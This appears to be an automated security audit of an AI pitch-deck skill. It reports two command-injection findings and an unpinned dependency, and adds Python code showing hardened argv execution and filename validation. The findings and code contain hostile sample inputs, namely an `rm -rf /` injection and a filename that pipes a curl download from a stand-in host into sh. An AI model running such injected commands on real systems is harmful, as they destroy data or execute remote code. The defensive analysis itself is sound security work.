Security Audit
ailabs-393/ai-labs-claude-skills:packages/skills/pitch-deck
github.com/ailabs-393/ai-labs-claude-skills
Trust Assessment
ailabs-393/ai-labs-claude-skills:packages/skills/pitch-deck received a trust score of 25/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Potential Command Injection via `grep` command, Potential Command Injection via Python script execution, Unpinned Python dependency `python-pptx`.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 25/100; all three findings below come from that layer.
Last analyzed on March 14, 2026 (commit 1a12bc7a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Potential Command Injection via `grep` command. The skill instructs the LLM to construct and execute a `grep` command in which parts of the search pattern (`[Slide Number]`, `[Slide Name]`) are likely derived from user input. If that input is inserted into the command line unsanitized, an attacker can terminate the quoted pattern and append shell commands (e.g., `'; rm -rf /'`), leading to remote code execution. Do not concatenate user input into shell strings. If a command must be run, use a tool execution environment that strictly validates every argument, or a library call that passes arguments without a shell (e.g., `subprocess.run` with `shell=False` and an argument list). Because the user text is used as a grep pattern, also pass it after `--` and with `-F` so it is read neither as an option nor as a regular expression. | Static | SKILL.md:70 |
| CRITICAL | Potential Command Injection via Python script execution. The skill instructs the LLM to run `python3 scripts/create_pitch_deck.py pitch_data.json output_filename.pptx`, where `output_filename.pptx` is user-controlled. If the filename is passed to a shell unsanitized, an attacker can append arbitrary shell commands (e.g., `'; rm -rf /'`), leading to remote code execution. Do not concatenate user input into shell strings. If a command must be run, use a tool execution environment that strictly validates every argument, or a library call that passes arguments without a shell (e.g., `subprocess.run` with `shell=False` and an argument list). Validate the filename against an allowlist (plain basename, `.pptx` extension, no path separators or `..`) and resolve the final path to confirm it stays inside the intended output directory. | Static | SKILL.md:150 |
| HIGH | Unpinned Python dependency `python-pptx`. The skill instructs users to install `python-pptx` with `pip3 install python-pptx` and no version. Leaving the dependency unpinned exposes users to supply-chain risk: if a malicious or vulnerable version of `python-pptx` is published, users following the install step will pull it in unknowingly, and installs are non-deterministic. Pin to a specific, known-good version (e.g., `pip3 install python-pptx==0.6.21`), review and update the pin regularly to pick up security fixes, and consider a `requirements.txt` (ideally with `--hash` entries) so installs are reproducible. | Static | SKILL.md:204 |
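The two CRITICAL findings describe the same defect: caller-controlled text spliced into a shell command string. The following is an added example, not code from the pitch-deck skill or from SkillShield, that puts the flagged pattern beside its hardened form: the `grep` pattern and the deck filename are passed as argv elements with `shell=False`, and the filename is checked against an allowlist and a resolved-path containment test before use. The names `pitch_data.json` and `scripts/create_pitch_deck.py` come from the report; the `output` directory, the hostile sample inputs and all function names are assumptions.

```python
"""Added example, not code from the pitch-deck skill or from SkillShield.

Contrasts the pattern the two CRITICAL findings describe (user text spliced
into a shell command string) with argv-list execution plus an allowlist
check on the caller-supplied output filename. The file names
pitch_data.json and scripts/create_pitch_deck.py come from the report;
the 'output' directory and all function names are assumptions.
"""
import re
import subprocess
from pathlib import Path

# Constructed hostile inputs of the kind the findings describe.
HOSTILE_SLIDE = "Problem'; rm -rf / #"
HOSTILE_FILENAME = "deck.pptx; curl http://example.invalid/x | sh"


def vulnerable_grep_command(slide_ref: str, target: str = "pitch_data.json") -> str:
    """The flagged pattern: user text interpolated into one shell string.
    Returned rather than executed so the injected ';' stays visible. Run with
    shell=True, the single quote in slide_ref closes the quoting and the rest
    of the string executes as a second command."""
    return f"grep -n '{slide_ref}' {target}"


def safe_grep_argv(slide_ref: str, target: str = "pitch_data.json") -> list[str]:
    """The pattern travels as one argv element, so no shell ever parses it.
    '--' stops a pattern beginning with '-' being read as a grep option and
    '-F' makes grep treat it as a fixed string, not a regular expression."""
    return ["grep", "-n", "-F", "--", slide_ref, target]


# Allowlist for the deck filename: plain basename of ASCII letters, digits,
# dots, underscores and dashes, ending in .pptx. No '/', '\\', ';', quotes or spaces.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.pptx")


def validate_output_filename(name: str, out_dir: Path = Path("output")) -> Path:
    """Return the resolved path for a valid name, or raise ValueError.
    The resolve()/parent check is a second line of defence against
    traversal even if the regex were loosened later."""
    if not _SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected output filename: {name!r}")
    out_dir = out_dir.resolve()
    candidate = (out_dir / name).resolve()
    if candidate.parent != out_dir:
        raise ValueError(f"path escapes output directory: {name!r}")
    return candidate


def is_safe_output_filename(name: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_output_filename(name)
        return True
    except ValueError:
        return False


def safe_create_deck_argv(data_file: str, output_name: str) -> list[str]:
    """argv for the script invocation named in the second finding, with the
    user-supplied filename validated and the script path fixed."""
    out_path = validate_output_filename(output_name)
    return ["python3", "scripts/create_pitch_deck.py", data_file, str(out_path)]


def run_argv(argv: list[str]) -> subprocess.CompletedProcess:
    """Execute an argv list without a shell; each element is passed verbatim."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    import json
    import tempfile

    # Constructed sample pitch data so the grep can run against a real file.
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as fh:
        json.dump({"slides": [{"name": "Problem"}, {"name": "Solution"}]}, fh)
        sample = fh.name

    print("vulnerable string:", vulnerable_grep_command(HOSTILE_SLIDE))
    print("safe argv:        ", safe_grep_argv(HOSTILE_SLIDE, sample))
    # Without a shell the hostile text is just a pattern that matches nothing.
    print("grep exit status: ", run_argv(safe_grep_argv(HOSTILE_SLIDE, sample)).returncode)
    for name in ("deck.pptx", "../deck.pptx", HOSTILE_FILENAME):
        print(f"{name!r:45} -> {is_safe_output_filename(name)}")
```

The allowlist is deliberately narrow: rejecting by regex is safer than trying to escape the filename for whatever shell the LLM's tool environment happens to use, and the `resolve()` containment check catches traversal independently of the regex.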
Full report: https://skillshield.io/report/7fd54d489d54799d
Powered by SkillShield